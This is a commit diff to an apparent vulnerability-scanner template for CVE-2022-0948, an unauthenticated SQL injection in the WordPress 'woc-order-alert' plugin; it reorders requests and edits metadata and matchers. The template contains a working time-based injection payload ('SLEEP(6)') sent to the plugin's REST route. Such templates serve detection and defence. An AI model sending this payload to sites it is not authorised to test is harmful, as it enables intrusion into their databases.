Update CVE-2022-0948.yaml

2022-12-05 17:23:26 +05:30 · 2022-12-05 17:23:26 +05:30 · 2fb6ca231f
parent f0f87d7c9f
commit 2fb6ca231f
1 changed files with 11 additions and 14 deletions
--- a/cves/2022/CVE-2022-0948.yaml
+++ b/cves/2022/CVE-2022-0948.yaml
@ -11,20 +11,13 @@ info:
    - https://wordpress.org/plugins/woc-order-alert/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0948
  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
-    cvss-score: 9.8
    cve-id: CVE-2022-0948
-    cwe-id: CWE-89
  metadata:
-    verified: "true"
-  tags: cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,woc-order-alert,unauth
+    verified: true
+  tags: cve,cve2022,wordpress,wp-plugin,wp,sqli,woc-order-alert,unauth

 requests:
  - raw:
-      - |
-        GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1
-        Host: {{Hostname}}
-
      - |
        @timeout: 15s
        POST /?rest_route=/olistener/new HTTP/1.1
@ -33,12 +26,16 @@ requests:

        {"id":" (SLEEP(6))#"}

+      - |
+        GET /wp-content/plugins/woc-order-alert/assets/admin/js/scripts.js HTTP/1.1
+        Host: {{Hostname}}
+
    req-condition: true
    matchers:
      - type: dsl
        dsl:
-          - 'duration_2>=6'
-          - 'status_code_2 == 200'
-          - 'contains(content_type_2, "application/json")'
-          - 'contains(body_1, "olistener-action.olistener-controller")'
-        condition: and
+          - 'duration_1>=6'
+          - 'status_code_1 == 200'
+          - 'contains(content_type_1, "application/json")'
+          - 'contains(body_2, "olistener-action.olistener-controller")'
+        condition: and